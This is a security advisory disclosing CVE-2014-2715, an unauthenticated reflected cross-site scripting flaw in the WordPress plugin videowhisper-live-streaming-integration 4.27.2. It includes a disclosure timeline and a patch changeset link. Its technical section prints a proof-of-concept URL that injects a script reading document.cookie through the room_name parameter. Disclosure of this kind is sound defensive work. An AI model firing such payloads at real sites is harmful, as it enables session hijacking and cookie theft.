wp-plugin : videowhisper-live-streaming-integration | Code Vigilant : to err is human.. To fix is Humanity

Wp Plugin Videowhisper Live Streaming Integration

Plugin Details

Plugin Name: wp-plugin : videowhisper-live-streaming-integration

Effected Version : 4.27.2 (and most probably lower version's if any)

Vulnerability : Cross-Site Scripting (XSS)

Minimum Level of Access Required : Unauthenticated

CVE Number : CVE-2014-2715

Identified by : Anantshri

WPScan Reference URL

Disclosure Timeline

January 2, 2014: Vendor Contacted
January 6, 2014 : Plugin Updated
June 12, 2014 : Public Disclosure

Technical Details

http://localhost/wp-content/plugins/videowhisper-live-streaming-integration/ls/vv_login.php?room_name=%27%3E%3Cscript%3Ealert%28document.cookie%29%3C%2Fscript%3E%26

Vulnerable Parameter : room_name

Trac ChangeLog : https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&new=833654%40videowhisper-live-streaming-integration&old=833649%40videowhisper-live-streaming-integration&sfp_email=&sfph_mail=

Note:The same vulnerability was present in a Drupal module.